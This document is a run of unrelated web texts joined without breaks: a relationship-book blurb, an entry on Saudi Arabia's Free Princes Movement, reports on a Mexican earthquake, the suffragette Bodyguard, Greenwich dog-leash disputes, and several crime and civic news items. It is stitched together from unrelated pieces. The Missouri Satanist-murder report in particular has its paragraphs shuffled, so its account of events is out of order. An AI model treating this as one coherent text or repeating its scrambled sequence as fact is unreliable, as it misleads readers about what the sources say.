After speaking out about how weak and insecure men control women in relationships in 2009 on several globally televised shows, Tony Gaskins launched his career as a life coach and relationship counselor. Since then, Gaskins, who has been a faithful and committed husband for over a decade, has counseled thousands and inspired millions online, becoming one of America's foremost experts on love and relationships.
Practical and accessible, and delivered in the empowering, empathetic tone his devoted following has come to love and trust, Make It Work walks you through a series of essential lessons on how to maintain a healthy and long-lasting relationship. Drawing inspiration from the Bible and from his own personal failures and successes, Gaskins offers a framework for how to recognize the right person to settle down with, how to set standards that promote loving relationships—and what to avoid in a successful union.
Make It Work arrives as a hopeful response to a culture where breakups and divorces are all too common, and it serves as a vital resource to help your relationship thrive today.
The Free Princes Movement (Arabic: حركة الأمراء الأحرار‎) was a Saudi liberal political movement that existed from 1958 to 1964. Its members were known as the Young Najd, Free Princes, and Liberal Princes.
Establishment [ edit ]
It was founded by Talal bin Abdulaziz Al Saud because of the tensions between Crown Prince Faisal and King Saud. It was heavily idealized around the iconic figure of Gamal Abdel Nasser and his pan-Arab nationalism. It called for political reforms and a constitution.[1]
It received support from the relatively liberal (and at the time, relatively small) Saudi middle class but generally did not have a large base of support within the broader population.[2][3] The movement was supported by Talal's brothers, Nawwaf bin Abdulaziz, Fawwaz bin Abdulaziz and Badr bin Abdulaziz.[3][4] Another brother, Prince Abdul Muhsin, vocally supported the movement and suggested a constitutional monarchy.[5] In addition, the movement was also supported by younger princes from the cadet branches of the House of Saud.[6] Another significant ally was then oil minister Abdullah Tariki.[6] Crown Prince Faisal expelled many of its members to Lebanon and later pardoned them when he became king.
Internal royal opposition [ edit ]
Prince Talal suggested the creation of a national council in 1958.[3] The group drafted its own constitution. Its constitution placed more power in the hands of the cabinet, removed most of the authority of the King, and created a partially-elected advisory committee.[7] Most members of the Al Saud were strongly opposed to the movement, and both King Saud and Crown Prince Faisal repudiated its reforms initially. It was also attacked as "crypto-communist" by Saud.[2]
In May 1960, Prince Talal told the Egyptian newspaper Al Gomhuria (The Republic) of a gradual trend towards a "constituent assembly, first constitution, supreme court, and a supreme planning commission". He went on to say "the problem is how to accomplish this experiment."[2][3]
However, in December 1960, Talal's supporters formed a coalition with Saud to undermine Faisal's growing influence.[2][3] Saud promoted Talal from minister of transport to minister of finance.[3] But in a turn of events, the movement began to support many of Crown Prince Faisal's reforms.[2]
In the late 1961, King Saud began to lose considerable support in the House of Saud. Ironically, he increasingly became dependent on the few Nasserite nationalists in his Cabinet. Saud reconciled with Faisal under Faisal's precondition to remove the movement entirely from the Cabinet.[8] It was exiled to Lebanon; for the next few years, Prince Talal moved between Beirut and Cairo.[3]
At the end of 1962, they formed the Arab National Liberation Front ('Free Saudis Movement') in Cairo, commonly referred to as Free Princes Movement.[9]
Egyptian link and Yemen revolution [ edit ]
Its name originates from the Free Officers Movement, a group led by Nasser that overthrew the Egyptian monarchy.[2]
Talal applauded Nasser after Egypt's successful long-range missile tests.[5] Even after Nasser called for the overthrow of the Al Saud in Saudi Arabia by stating "to liberate all Jerusalem, the Arab peoples must first liberate Riyadh", Talal went to Cairo to meet Egypt's military brass.[5] Talal's supporters (Prince Fawwaz, Prince Badr, and a cousin, Saad bin Fahd) also self-exiled to Cairo.[8]
Yemen's revolution, which evolved into a cold war between Saudi Arabia and Egypt, led to increased power for the Free Princes, which did not call for the complete overthrow of the Saudi monarchy but simply major democratic reforms.[10] In September 1962 Egyptian, Syrian, and Yemeni radio stations openly encouraged Saudis to rebel against their "corrupt" and "reactionary" monarchy and for its supplanting with members of the Free Princes.[8]
Estrangement with Nasser [ edit ]
Soon, Radio Yemen (an Egyptian-controlled organ) called for the assassination of the Al Saud including the Free Princes. That was one reason that the Free Princes became increasingly embittered with Nasser.
In August 1963, Talal declared that he was "entirely wrong" in the past and praised Faisal's reforms. By early 1964, the Free Princes returned from exile in Beirut. The movement ended.
A large earthquake has struck near Acapulco on Mexico's Pacific coast.
The United States Geological Survey (USGS) said the quake had a magnitude of 7.4 and put the epicentre at 15 miles (25km) east of Ometepec, in Guerrero state.
Eleven people were injured in the quake, two of them seriously, Interior Minister Alejandro Poire said.
Witnesses in the capital, Mexico City, said the tremor sent office workers rushing out onto the streets.
At least 800 houses were damaged in Guerrero state, local officials said.
The state governor, Angel Aguirre, told Milenio television that so far there were no casualties in Guerrero state or nearby Oaxaca state, adding that the authorities were checking schools and public buildings near Ometepec.
The interior ministry said it had registered 18 aftershocks to the quake.
The director of the country's seismological service, Carlos Valdes Gonzalez, said one of them had a magnitude of 5.3.
The BBC's Will Grant, in Mexico City, says buildings swayed for at least a minute in the capital.
A pedestrian bridge collapsed and crushed a microbus in Mexico City, but there were no reports of deaths.
Office workers and residents were sent running into the streets in wealthy districts and poor neighbourhoods alike, he reports.
Thundering walls
Samantha Rodriguez, a 37-year old environmental consultant, was evacuated from the 11th floor of an office block.
Image caption A bus was crushed by a collapsed bridge in Mexico City
"I thought it was going to pass rapidly but the walls began to thunder and we decided to get out," she said.
Sirens could be heard across the city, and police helicopters are crisscrossing the skies.
"I swear I never felt one so strong, I thought the building was going to collapse," said Sebastian Herrera, 42, a businessman from a neighbourhood hit hard in Mexico's devastating 1985 earthquake, which killed thousands.
Mexico City Mayor Marcelo Ebrard's Twitter account said there had been damage to the water supply system and that some homes would be without water for a day.
Mobile phone networks have been affected, our correspondent says, and people have had trouble contacting their loved ones.
Gabino Cue, the governor of Oaxaca state, said via Twitter that the quake had caused cracks in school buildings and damaged roofs in one part of the state.
The USGS said the epicentre was 11 miles (18km) underground.
The US president's daughter, 13-year-old Malia Obama, was on a school trip in Oaxaca. A White House official said she was safe and had never been in danger.
We have not yet made ourselves a match for the police, and we have got to do it. The police know jiu-jitsu. I advise you to learn jiu-jitsu. Women should practice it as well as men. Don't come to meetings without sticks in future, men and women alike. It is worth while really striking. It is no use pretending. We have got to fight.
– Suffragette leader Sylvia Pankhurst, quoted in the New York Times on August 12th, 1913.
By 1913, the sociopolitical battle that was the British women's suffrage movement had reached a boiling point. Faced with the practice of hunger striking by jailed Suffragette leaders, the government responded with the so-called “Cat and Mouse Act“; an unprecedented amendment to the law that allowed prisons to deal with starving prisoners without resorting to the highly controversial methods of forced feeding. Under the new Act, a starving suffragette could be released from jail, allowed time on the outside to recover her health, and then be re-arrested on the original charge.
To keep their leaders free as long as possible, as well as to protect them against run of the mill assaults by irate defenders of the status quo, the Women's Social and Political Union created a secret society known as The Bodyguard. Numbering 25 or 30 athletic and dedicated women, the Bodyguard was charged with providing security at Suffragette rallies throughout the UK.
The Bodyguard took their duties seriously and, following Sylvia Pankhurst's advice, started training in the Japanese martial art of jujitsu, which had been introduced to London some 15 years previously by Edward William Barton-Wright, the founder of the eccentric and eclectic self defence art of Bartitsu. They were trained in a succession of secret locations by Edith Garrud, who was among the very first professional jujitsu instructors in the Western world. Journalists, delighted by this colourful wrinkle in an already juicy story, quickly dubbed the Bodyguard the “jujitsuffragettes”.
Along with their practical duties, the Bodyguard also became something of a symbolic rallying point as the Suffrage movement became ever more radical. They served an important role as agents of propaganda, ensuring that women's suffrage stories stayed in the newspaper headlines; a necessary and valuable tactic towards winning over hearts and minds.
Many colourful stories are told of the adventures of the Bodyguard. After one window-smashing protest, Edith Garrud reminisced, she led a group of suffragettes fleeing the police through the back-alleys of London to her dojo (martial arts school), where the fugitives hid their weapons in trapdoors hidden under the mats. By the time the “bobbies” came knocking at the door, they found only a group of young women innocently practicing jujitsu.
Although vastly outnumbered by the police, the Bodyguard accomplished several truly impressive victories. On the night of February 10th, 1914, Suffragette leader Mrs. Emmeline Pankhurst (Sylvia's mother and a fugitive under the Cat and Mouse Act) was scheduled to give a speech to the public in Camden Square. By 8.00 that evening, the Square was filled with both pro- and anti-suffrage citizens and with a large contingent of police constables. Mrs. Pankhurst appeared on a balcony high above the Square and, pulling up the veil of her hat, delivered a rousing address, finishing by taunting the police and the government:
I have reached London tonight in spite of armies of police. I am here tonight, and not a man is going to protect me, because this is a woman's fight, and we are going to protect ourselves! I am coming out amongst you in a few minutes and I challenge the government to re-arrest me!
When the tiny, veiled woman did emerge at street level, escorted by members of the Bodyguard, the police quickly swept in. Bodyguard Katharine Willoughby Marshall rallied the crowd: “It's Mrs. Pankhurst, friends! Don't let her be arrested!” The crowd surged forward but the police pounced first. When the constables pulled out their truncheons, the Bodyguard responded in kind, drawing hardwood Indian clubs (bowling-pin shaped clubs intended for exercise classes) from the bustles of their long dresses. There was a short, bloody fight, but the police managed to seize their target. She was struck on the head and thrown to the ground, where several men held her down with their full body weight, causing her to pass out due to asphyxiation. Six policemen then lifted her unconscious body to shoulder height and began to push their way through the roiling crowd, as Katherine Marshall called out again, “Help Mrs. Pankhurst!”
The Bodyguard continued to batter the police as they made their way towards the nearby Ladbroke Grove station, at which point, bruised and exhausted, they discovered that the veiled women they had captured was a decoy; the real Mrs. Pankhurst was long gone, having simply waited out the excitement in the balconied house at Camden Square before being spirited away by the Bodyguard and a “smart woman driver”.
By far the most dramatic event in the history of the Bodyguard, though, took place about a month later. The “Battle of Glasgow” occurred at a Suffragette meeting at St. Andrew's Hall in Glasgow, Scotland. As Mrs. Pankhurst had written in a letter to her friend Ethel Smyth:
Whatever happens will hit the Government. If I get away they will again be laughed at, and if I am taken the people will be roused. The fools hurt themselves every time.
The Bodyguard had travelled up from London by train, spending an uncomfortable night in a third-class carriage before booking into a local hotel under the guise of a theatrical troupe.
On the evening of March 9th, St Andrew's Hall was packed to capacity with a crowd largely sympathetic to the Suffragettes' cause. The Bodyguard carefully surveyed the crowd from their vantage point, a semi-circle of chairs set up on the stage directly behind the speaker's podium. Garlands of white and purple flowers decorated the edge of the stage and banners bearing the Suffragette mottoes, “Deeds Not Words” and “Votes for Women” were strung high above them.
The Glasgow police had taken no chances, surrounding the entire hall with a cordon and also stationing 50 constables in the basement. The atmosphere was tense, even more so when the appointed hour of 8.00 came and went with no sign of Mrs. Pankhurst. Many members of the audience doubted that she could possibly break through the cordon, no matter how many Bodyguards she might have to help her. Thus, when she suddenly appeared on the stage, the effect was like magic; though, as with the most apparently sophisticated illusions, the principle was simple misdirection. After spreading a rumour that she would attempt to breach the cordon, she had in fact arrived at the hall early and in disguise, paid for her ticket like any other member of the public, and taken a seat close to the platform.
I have kept my promise and in spite of his Majesty's Government I am here tonight. Very few people in this audience, very few people in this country, know how much of the nation's money is being spent to silence women. But the wit and ingenuity of women is overcoming the power and money of the Government! My text is – equal justice for men and women, equal political justice, equal legal justice, equal industrial justice and equal social justice!
That was as far as she got before being interrupted by the heavy tread of police boots, as the squadron in the basement made their way upstairs to the hall. Just as the helmeted head of the lead constable, a giant of a man, appeared in the doorway, Janie Allen, a Scottish Bodyguard who was wearing an elegant black evening gown, stood up from her seat, drew a pistol and fired it straight at his chest. There was a deafening blast and the constable fell back into his colleagues, believing that he had been shot – but in fact, the pistol was loaded with blanks.
As the startled and angry police struggled to climb past the panicked giant in the doorway, the Bodyguard pulled out their Indian clubs and took up a defensive formation around Mrs. Pankhurst, who continued to speak over the commotion. The police finally broke through onto the stage and a fearsome fight took place; 25 women armed with Indian clubs and jujitsu vs. 50 truncheon-wielding police constables. The audience began to jeer and boo at the police, drowning out the speech they had come to hear.
Pandemonium now reigned in the hall. Several plain-clothes detectives, who had been hiding in the crowd, attempted to blindside the Bodyguard by climbing onto the platform, but were repelled by a barrier of barbed wire that had been hidden in the floral garlands decorating the edge of the stage. Old ladies then stood up and belaboured the detectives with their umbrellas. Chairs and tables were overturned as the combatants on the stage swung and jabbed, grappled and fell. Gert Harding, the Canadian woman who was the tactical leader of the Bodyguard, was not allowed to risk arrest by being caught with a weapon and was therefore unarmed when a constable raised his truncheon at her. She later recalled being surprised when he seemed to change his mind at the last instant and, instead, threw her into a pile of toppled chairs.
Eventually, the constables overwhelmed the Bodyguard resistance and hauled Mrs. Pankhurst off to a waiting police cab, her clothes torn to shreds during the struggle. The audience was outraged, particularly when the detectives attempted to break up the meeting, and angrily shouted them down; the meeting was, in fact, legal and they carried on with it, hearing speeches by other Suffragette leaders. Afterwards the crowd marched to the Central Police Station in St. Andrew's Square, forming a mob of protestors that was estimated to include some 4,000 people, chanting their support for Mrs. Pankhurst until they were dispersed by police on foot and horseback.
The “Battle of Glasgow” changed the course of the Suffrage movement. As Mrs. Pankhurst had predicted, her arrest at St. Andrew's Hall roused her supporters to a new pitch. The next day, a Suffragette named Mary Richardson protested the arrest by taking a meat cleaver to the Rokeby Venus, a famous and very valuable painting hanging in London's National Art Gallery, later saying:
I have tried to destroy the picture of the most beautiful woman in mythological history as a protest against the Government for destroying Mrs. Pankhurst, who is the most beautiful character in modern history.
Thereafter, the Suffragettes' protests by arson and vandalism became more frequent and much more destructive, provoking a backlash both from within the WSPU and from the general public as well. The Bodyguard continued their duties, however, including an infamous street fight with the police outside Buckingham Palace on May 21 that left one constable knocked unconscious and many people injured.
The outbreak of the First World War, though, put an end to the Bodyguard and to most radical Suffragette activity, as Mrs. Pankhurst decided that “votes for women” would be meaningless if England was conquered by Germany. Instead, she urged her supporters to throw their strengths and skills into supporting the government for the duration of the crisis, including many activities that were formerly considered to be strictly “men's work”.
In March of 1918, the Representation of the People Act was passed, granting voting rights to some eight million British women.
Further reading:
Edith Garrud: the Suffragette who knew jujutsu
With All Her Might: The Life of Gertrude Harding, Militant Suffragette
It's almost that time of year. Starting on Dec 1, dogs will be allowed at the beach, though there are strict rules.
Many residents are excited.
Many are leary of off leash dogs being aggressive or knocking people over.
And still others are already fed up.
There are simply too many dogs whose owners flout the town's leash law, ruining a potentially wonderful experience for others.
And it's not necessarily just Greenwich residents who will be at the beach. During the dog months, Dec 1 through March 31, non-Greenwich residents are allowed into the beach along with their dogs.
ACO Stacy Rameor, who agrees that off leash dogs in Greenwich are a huge problem, said enforcement is a challenge.
Unfortunately, Greenwich Animal Control will not be doing enforcement on Dec 2 and 3, which is the first weekend of dog season due to staffing shortages. (There is only one animal control officer on duty this weekend and she has to stay at the shelter on North Street where there are 14 dogs in the town's care.)
Dogs are supposed to be leashed upward of the median high tide line and on all paths at Tod's Point.
Greenwich Police Car 53 will be at Tod's Point over the weekend in case there is an incident.
Also, on Saturday, a recently formed non-profit group, PAWS of Greenwich, is organizing an educational event at the beach on Saturday, to inform dog owners of their responsibilities, as well as provide information on dog licenses, and give away free dog waste bags.
Rameor summed up the problem, which goes far beyond scofflaw dog owners at the beach.
“A lot of folks with off leash dogs don't see it as a problem,” she said, adding that most of the complaints Animal Control receives are from pedestrians, especially children and older people.
“They say, ‘Don't worry. My dog is friendly and not a problem.' Until there is a problem,” Rameor added.
That message seems to bear out based on comments from about a dozen Greenwich residents interviewed for this story. All view the situation as a quality of life issue.
Whitney Alexander, who lives in Cos Cob, said she is constantly vigilant while dog walking.
“You're on your own in this town,” Alexander said. “You should be able to walk your dog down the street and not have loose dogs running off people's properties and attacking your dog. You can never relax.”
Alexander said dogs are running around off leash in parks and on school grounds at all times of day. “Residents aren't following the leash law,” she said. “If the town cared about it, it's easy to get the word out. All they have to say is we are really enforcing the leash law, and you'll be fined if your dog is off leash. It should be like a DUI enforcement or click it or ticket.”
Ms. Rameor said Animal Control officers do issue tickets. She said when people pay fines, they are sent to the Centralized Infraction Bureau in Hartford. The fines are $92.00 for roaming and $75 for nuisance, a category that includes dog bites. The fines are dictated per state statute.
Mary Hull, who leads Greenwich Green & Clean and describes herself as “a total dog person,” said, “An over enthusiastic dog jumping on a small child at the beach could create a catastrophe for life.
Hull said she'd like to see more opportunities for dogs at the beach, but only with discipline. She suggests a snow fence to cordon off an area at the end of the beach just for dogs to swim. “Why should the dogs be in the same place where the kids are making sand castles?” she asked. “And leave that leash on them for that swim.”
Hull likens dogs who are badly behaved to children. “It's like going to a nice restaurant and having two mothers chatting with each other and having their children running around shouting. It's the dog owner's and parents' fault,” she said.
Former caretaker at Tod's Point, Mike Henry, said over the years he was bitten by dogs three times.
Petie, an employee with a local landscape management company, who is on Greenwich roads throughout the work week said, her greatest concern, besides having been bitten by dogs, is unexpectedly seeing a dog dart into the road. She said that at least two or three times a week, she'll drive by a person walking a dog off leash and the dog darts into the road.
“I have a wonderful relationship with animals, but I don't want to see people get hurt. My instinct is to try to avoid the dog,” she said, adding that while this happens throughout town, it is particularly common in Old Greenwich.
“People are walking with a dog off leash, thinking they have very well trained, lovely dog,” she said. “But an animal's instinct – if they see another dog – is to dart out, and that is what I see.”
Old Greenwich resident, Hermine Brindak, who has a Maltese and a Maltese mix rescue, said she likes to take the two dogs to Tod's Point in the winter months. She said after the dogs explore along the water's edge at the beach, she walks them around the Point on leashes, but had a horrifying incident two years ago, just after rescuing the Maltese mix.
“Our two dogs were joined by my daughter's Beagle puppy. All three were on leashes,” Brindak recalled. “We passed another dog, a Terrier, we'd seen at the beach earlier who had acted aggressively toward the puppy,” she continued, adding that she had said something to the other dog's owner, but he had been dismissive. “He said, ‘Dogs can behave aggressively,' but this was an innocent little puppy.”
Brindak said that when she next saw the other dog's owner, who was with his wife, toddler, infant in a stroller, and off leash Terrier, they approached her on the path at the furthest point of the park.
“The Terrier was dragging his leash, and when he saw the Beagle puppy he leaped at our three dogs, including our rescue who we only had for three days,” Brindak said. “He bit her and was hanging onto her like a cartoon, spinning her around and around. He ripped off a whole patch of skin.”
Brindak said the Terrier's owner said he felt terrible and offered to reimburse her for medical bills, no matter the cost. “‘I'll pay. Here's my phone,'” Brindak recalled him saying. And he did pay for the emergency care from Cornell University Veterinary Specialists in Stamford. Brindak said since the owner did the right thing, she was reluctant to animal control, but regrets that decision. “There are a lot of people who say their dogs would never bite. But they don't really know,” she said.
As for her one visit to Grass Island Dog Park, the town's only off leash park for dogs, Brindak was not impressed.
“It was disgusting. It was a muddy slope,” she said. “In Philadelphia where my daughter lives, there is an off leash dog park that's fenced in and has benches for the owners to sit. It's nice and clean and there are no issues – and that's in a city!” she said.
Brindak said she wishes Greenwich would hire a monitor to walk up and down the beach and give tickets to owners whose dogs are not behaving.
Local resident Sarah Bamford, said she had a run-in with a large off leash dog when she was walking her Chihuahua on Old Kings Hwy behind Greenwich Commons.
“The dog ran out from a yard and up the street,” she recalled. Bamford's dog was unharmed, but she said the loose dog kept jumping on her trying to get to her tiny dog, which she held over her head as she screamed for help.
“The other dog jumped on my back with his paws. I realized he wasn't going to bite me, but he continued to jump on me to try to get my dog. I had to scream, ‘Come get your dog.' When the owner finally came, he couldn't catch the dog. It was running circles around me,” Bamford continued. “The last thing I saw the the owner running trying to catch his dog.”
Parks & Red director Joe Siciliano said, “People are going to do what's convenient to where they live. Even having five dog parks might not solve the problem.”
Siciliano said owners may be unaware of the rules. “Maybe it's an educational problem. People see off leash dogs and assume it's acceptable. It's become the norm versus the rule, which are different.”
Unfortunately, Siciliano said people in his own department have had encounters with loose dogs while mowing and weed whacking.
“There have multiple encounters in town parks between our workers and dogs off leash,” he said, adding that there was one dog bite that necessitated a town worker having to go to the hospital.
ACO Rameor said the biggest problem with off leash dogs is within the town's parks. “When we have a free hour, we patrol parks. Dog owners send out texts to tell each other when we arrive. It's just not easy to enforce. By the time we get there, they're gone,” she said.
“We totally understand,”Rameor continued. “The problem is all over the own.” Rameor said Greenwich is not a “leash only town.” She said the state has an ordinance about roaming dogs, but that says nothing about being leashed – just that the dog must be under its owner's control. “Within Greenwich's parks, and where posted, the town has an ordinance prohibiting off leash dogs,” Rameor said, adding that she thinks the town could benefit from additional signage. This differentiation between leashed and “under an owner's control” may be confusing. Even more, there seems to be contradictory information on the Town's website. At the Town Clerk's web page, the rules say dogs must be leashed AND under the owner's control at all times. (see Dog Licensing Information below) A Town of Greenwich's “Quick Tips” sheet is worded differently. The quick tips sheet says the Board of Health has the authority to restrict areas for leashing and cleaning up in the town parks. They list restricted areas: Greenwich Avenue from West Putnam Ave to Railroad Avenue, public areas contiguous to Greenwich Avenue, Mill St in Byram, Greenwich Point from Dec 1-March 31, Byram Park, all public School grounds, all public park lands. In all these areas dogs must be kept on a secure leash less than 10 feet in length and dog handlers or owners must provide for prompt removal of feces. The fine is $25.00 plus State fees and a surcharge totaling $49 per violation.
Siciliano said he hopes the educational event at Tod's Point on Saturday will result in changes in behaviors. If anyone has an incident, the Greenwich Police car 53 will be present much of the weekend.
Beyond that, ACO Rameor said in general if there is an incident, it's best to report it to animal control or police dispatch right away at 622-8000.
“Too often people think about it for a few days before making the call,” she said. “People should call us the sooner the better.”
See also:
Conversations Under Way to Make Greenwich More Dog Friendly
Greenwich Enforces Ordinance against Commercial Dog Walkers at Mianus Park
Parks & Rec Board Divided over Expanding Opportunities for Dogs in Greenwich Parks (December 2016)
Interesting Parks & Rec Vote on Extending Dog Season at the Beach (Sept 2015)
Email news tips to Greenwich Free Press editor Leslie.Yager@GreenwichFreePress.com
Like us on Facebook
Twitter @ GWCHFreePress
Subscribe to the daily Greenwich Free Press newsletter.
Driver walks to jail after crashing car on Headwaters Park steps Copyright by WANE - All rights reserved Car driven by suspected drunk driver on the steps to Headwaters Park West on April 12, 2017. Inset photo is that of Katrina Catallo. [ + - ] Video
FORT WAYNE, Ind. (WANE) - A suspected drunk driver crashed on the steps to Headwaters Park West early Wednesday morning after reportedly taking her sedan on a joyride through the park.
The driver then walked one block to the Allen County Jail.
Police were notified around 3:40 a.m. that a woman who appeared intoxicated arrived at the lobby of the jail and said she crashed her car on the steps at Headwaters Park.
Copyright by WANE - All rights reserved Katrina Catallo
Copyright by WANE - All rights reserved Katrina Catallo
Several officers arrived near the park entrances on South Clinton Street and found a green 2002 Toyota Camry perched on top of the steps, caught up on a piece of concrete.
Police told NewsChannel 15 the woman told employees at the jail she was likely to get caught anyway and reported the incident. A police report identified her as Katrina A. Catallo. The 20-year-old was arrested on two counts of operating while intoxicated.
It's believed the woman entered the park somewhere off Calhoun Street and drove around the park on the pathways. She then drove parallel to Clinton before attempting to drive down the stairs.
Her car became lodged on a decorative piece of concrete.
Police believe alcohol is a factor in the incident.
MINNEAPOLIS - Minneapolis Police Chief Janeé Harteau has ordered Police Federation President Bob Kroll to stop wearing his uniform when giving interviews in his capacity as labor union representative.
In an email obtained by KARE 11, Harteau writes to Kroll, "As you know, by virtue of the clothing allowance, MPD uniforms are paid for by the city of Minneapolis. The City controls their use."
When reached for comment, Kroll said, "That's true. But I'll be fighting that and winning."
The email goes on to say, "As Chief of Police, I expect all MPD employees -- particularly those in leadership ranks such as lieutenant -- to set a good example for fellow MPD employees and a good example to the public. This letter is a reminder as well as a direct order that you wear your MPD uniform only for MPD-sanctioned purposes. If you are unclear about those purposes, you must schedule a meeting with Professional Standards Deputy Chief Glampe to discuss. 'MPD-sanctioned purposes' does not include speaking in your capacity as a labor union representative. Therefore, I am also directing you to not wear an MPD uniform when speaking in your capacity as a union representative."
Sign Up for the Sunrise Morning Newsletter Thank You Something went wrong. This email will be delivered to your inbox once a day in the morning. Thank you for signing up for the Sunrise Newsletter Please try again later.
Submit
Kroll said there has been a long-standing practice that allows union presidents to wear their uniform for interviews and appearances. He believes this order was crafted because of personal feelings toward him.
Harteau also states in the email that the Office of Police Conduct Review has received multiple complaints regarding Kroll's "recent conduct."
In a Star Tribune interview last week, Kroll commended four off-duty MPD officers who left their security posts at a Minnesota Lynx game in protest, after players wore warm-up jerseys that said "Black Lives Matter."
Kroll told the Star Tribune the reason only four officers were working the game was because the Lynx are "a pathetic draw."
Minneapolis Mayor Betsy Hodges responded on social media by calling Kroll's words "jackass remarks."
Satanists' Trail : Dead Pets to a Human Sacrifice
Satanists' Trail Next: The slaying and its aftermath.
Backing away, Steve tripped. As he fell, he heard a familiar laugh and the answer to his question--a reply bewitchingly soft in the December dusk.
Jim felt his baseball bat smash into Steven Newberry's face and saw Steve's eyes widen in terror as he cried out, staggered, then turned to run. The others gave chase, sneakers scrabbling madly through the loose gravel and dead leaves. Steve was big and slow. He wheeled around to face his friends as they closed in.
But in the darkening woods, four teen-agers lingered, enjoying the rush they always felt when they killed something. A kitten lay crumpled nearby. Sharing some unspoken secret, the boys exchanged furtive glances in the fading light. They were growing edgy. Suddenly, Jim Hardy heard a voice give the command:
CARL JUNCTION, Mo. — The moon, just out, hung over the Ozarks like a pale opal. Soon families would be saying grace over Sunday dinner; children would be clamoring to turn on the Christmas lights. It was time to go home.
"Because it's fun, Steve."
Knowing, as they do now, how brutal and how pointless the murder of Steven Newberry was, the people in this remote speck of southwestern Missouri are filled with grief. There is guilt as well, because it is also clear that his death really was foreseeable.
It took the police, after all, less than a day to follow the whispers and warnings that led to Jim Hardy, Pete Roland and Ron Clements, who admitted almost matter-of-factly that they had clubbed Steve to death with baseball bats, tied a 200-pound boulder to his body and dumped him into a well.
They did it, they said, partly out of curiosity: They simply wondered what it would feel like to kill someone. But they also did it out of devotion, for Steven Newberry was dying proof, that winter's eve, of his young friends' faith in Satan.
He was a human sacrifice.
Harder to explain is why no one stepped in to save him.
Aftermath of Guilt
"Everybody is guilty. Everybody is hurt. Everybody feels responsible," Penny Baert said a few days before her son, Pete Roland, began serving time for first-degree murder. "You feel like there's just some small thing you should have done that would have changed everything, and you don't know what it is."
Even now, the people of Jasper County wonder how this Bible Belt hamlet became the moral battleground of a deeply disturbed adolescent subculture--noticed but never really challenged--that still survives.
They blame the heavy drug use, the violent music, the forbidden books, the gory movies. And they blame themselves--all the friends, families, teachers, counselors, police, ministers, neighbors and classmates who unwittingly watched three 17-year-olds slip over the edge.
The clues had been mounting for years, telltale signs big and small that stacked up like building blocks. Interviews, police records, public and confidential documents, trial testimony and confessions tell the story.
Many trace the trouble to the day, five years ago, when James Hardy moved his family from Joplin to neighboring Carl Junction, a sleepy suburb whose rambling farms, blue-collar tracts and country club estates brush up against the Kansas border. Hardy was a certified public accountant. He and his wife, Nancy, had three boys and two girls. Their new split-level was surrounded by piney woods and verdant fields. It was a fine place to raise a family.
Start of Rebellion
Jimmy, the second oldest, had been an altar boy and honor student before his grades and behavior took a sudden tumble when he was 11. The nuns at his parish school suggested professional help, and Jim had sulked through a few sessions at the Ozark Mental Health Center in Joplin before his exasperated parents gave up.
Before allegedly fatally stabbing a couple and trying to eat one victim's face, police say the 19-year-old Florida State University student likely consumed unspecified chemicals he found in the couple's garage, PEOPLE confirms.
A police spokesperson tells PEOPLE investigators have been unable to interrogate Austin Harrouff, who they believe drank some hazardous household chemicals moments before allegedly attacking 59-year-old John Stevens and his 53-year-old wife, Michelle Mishcon.
Get push notifications with news, features and more.
Based on tests performed at St. Mary's Medical Center in West Palm Beach, where he remains in critical but stable condition, hospital officials suspect Harrouff ingested “something caustic” the night of the killings.
The police spokesperson tells PEOPLE Stevens' garage contained several solvents and other dangerous solutions, such as paint thinners and chemical cleansers.
Police can't say with confidence whether Harrouff drank the chemicals to hurt himself.
The spokesperson also tells PEOPLE that, soon after his arrest, Harrouff allegedly challenged the police who'd detained him to test him for drugs, saying: “Test me…you won't find any drugs.”
• Want to keep up with the latest crime coverage? Click here to get breaking crime news, ongoing trial coverage and details of intriguing unsolved cases in the True Crime Newsletter.
Authorities initially believed Harrouff may have been under the influence of the synthetic drug flakka when he allegedly attacked the couple and tried to eat Stevens' face.
Harrouff tested negative for common street drugs such as heroin, cocaine, and marijuana, but more extensive testing, which might take up to three weeks, is being performed by the Federal Bureau of Investigation to determine whether Harrouff was under the influence of bath salts or flakka.
Police have yet to release the results of the couple's autopsies, which showed Mishcon died from blunt force trauma injuries and Stevens died from multiple injuries.
Once he's released from the hospital, Harrouff will be charged with two counts of first-degree murder as well as attempted first-degree murder for allegedly stabbing the couple's neighbor, 47-year-old Jeff Fisher, who tried fending off their attacker.
He also faces burglary and resisting arrest charges.
Michelle Mishcon and John Stevens Michelle Mischon and John Stevens
Investigators say they are still trying to determine what allegedly drove Harrouff to commit last week's rampage.
Harrouff's parents issued a statement over the weekend, expressing their condolences. “There are no words we can offer to give any real comfort for this tragic loss,” the statement reads. “There are no words we can offer that we can make up for the injury sustained by Jeff Fisher who is doing what we would want all good neighbors to do which was to try to help innocent people from being hurt or killed.”
On Friday, the Martin County Sheriff's Office released video showing Harrouff walking out of the Duffy's Restaurant in Jupiter, Florida, the night of the attack.
It is unclear whether Harrouff has retained legal counsel.
In YouTube videos uploaded four days before the attack, Harrouff is seen discussing steroid use. In other clips, Harrouff appears to lift weights and makes references to himself as “The God of Fitness.”
Harrouff wrote on YouTube page believed to be his, “I've got a psycho side and a normal side,” and “I've lost my mind help me find it.”
The City University of New York is investigating whether a recent $500,000 donation intended to bolster the humanities and arts at its flagship school may have been improperly diverted.
The inquiry was prompted by senior faculty members at the school, the City College of New York, who learned that an account that should have contained roughly $600,000, thanks to the donation, had just $76. Faculty members asked City College officials for an explanation, but were met with “silence, delay and deflection” before appealing directly to the university's chancellor, James B. Milliken. Mr. Milliken then asked Frederick P. Schaffer, the university's general counsel and senior vice chancellor for legal affairs, to look into the “the expenditure of monies donated,” according to documents obtained by The New York Times.
The account in question — the Martin and Toni Sosnoff Fund for the Arts — is part of the holdings of the City College 21st Century Foundation, the school's principal fund-raising arm. The finances of that foundation, as well as those of City College's president and her family, are already being investigated by federal prosecutors in Brooklyn.
In May, The Times reported that the foundation had paid for some personal expenses of the president, Lisa S. Coico, such as fruit baskets, housekeeping services and rugs when she took office in 2010. The foundation was then reimbursed for more than $150,000 from the Research Foundation of the City University of New York, which manages research funds for CUNY, the largest urban public university system in the country. But that arrangement has raised questions of propriety, because such funds are typically earmarked for research.
Law enforcement authorities notified the FBI after a driver's license belonging to the biographer involved in an affair with former CIA Director David Petraeus was found in a District park on Monday, officials said.
A jogger discovered the North Carolina state license of Paula Broadwell in Rock Creek Park and later turned the card into Maryland-National Capital Park Police, said Lt. Bill Kellogg, a Park Police spokesman.
It was not clear to Park Police officials exactly where the license was found or how long it had been missing.
